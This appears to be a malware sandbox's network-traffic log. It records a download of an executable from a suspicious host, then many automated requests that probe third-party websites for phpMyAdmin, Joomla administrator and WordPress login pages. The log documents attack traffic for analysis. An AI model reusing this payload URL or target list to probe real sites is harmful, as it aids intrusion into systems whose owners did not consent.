Source: global traffic	HTTP traffic detected: GET /BeachGeology.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: wearethebestin2024.com
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: caspiantravel.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmcocorp.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: joaz.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.sgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: breecetechnology.co.zaAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: montessorihawaii.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: shinko-kensetsu.co.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: houseguru.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: iisalessandrini.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=1k9i469srqfgmr47e40c9d4e5jUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://acidvision.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://blauthlaw.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://strategicimpact.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m-viper.de/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cfgteam.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.eyegage.com/administrator
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
